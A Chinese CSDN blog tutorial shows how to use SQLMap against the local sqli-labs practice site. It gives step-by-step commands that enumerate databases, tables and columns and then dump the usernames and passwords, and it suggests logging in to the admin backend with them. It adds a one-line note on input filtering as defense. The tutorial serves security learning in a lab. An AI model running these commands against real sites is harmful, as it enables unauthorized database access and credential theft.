SQLMAP获取后台账号密码

QQ交流学习群:811401950

一. SQLmap
SQLMap是一个自动化注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。

二. 常见注入类型
ü 布尔类型盲注,即可以根据返回页面判断条件真假的注入
ü 基于时间的盲注,即不能根据返回页面的内容判断任何信息,要用条件语句查看时间的延迟语句是否已执行(页面返回时间的增加)来判断
ü 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中
ü 联合查询注入,在可以使用Union的情况下的注入
ü 堆查询注入,可以使用多条执行语句时的注入

三. 所用环境及工具
ü Python 2.7.8
ü SQLMap 1.4
ü Sqlilabs

四. 步骤

  1. 安装SQLMap需要安装python环境(不支持python3),实验中使用到的环境是python 2.7.8。安装好了过后如下图。
    在这里插入图片描述
  2. 把SQLMap安装包放入python的安装目录下面,进入到SQLMap的目录。
    在这里插入图片描述
  3. 判断目标URL是否存在注入点。检测出注入点,便进一步查询数据库。
    在这里插入图片描述
    在这里插入图片描述
  4. 查询当前用户下的所有数据库名称 sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” --dbs
    在这里插入图片描述
  5. 查询当前使用的数据库 sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” --current-db 获取当前数据库的名称
    在这里插入图片描述
  6. 进而查询当前数据中的表 sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” -D security –tables
    在这里插入图片描述
  7. 知道了表过后,就可以来查询表中的字段了 sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” -D security -T users –columns
    在这里插入图片描述
  8. 查询出了字段过后,就可以来查寻表中的数据了,也就是账号密码。得到帐户密码过后,可以寻找后台地址来尝试登陆。

sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” -D security -T users -C password,username –dump

在这里插入图片描述
五. SQL注入的防御

对客户端提交的代码进行严格的转义和过滤。

QQ交流学习群:811401950

发布了10 篇原创文章 · 获赞 7 · 访问量 177
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 游动-白 设计师: 上身试试

分享到微信朋友圈

×

扫一扫,手机浏览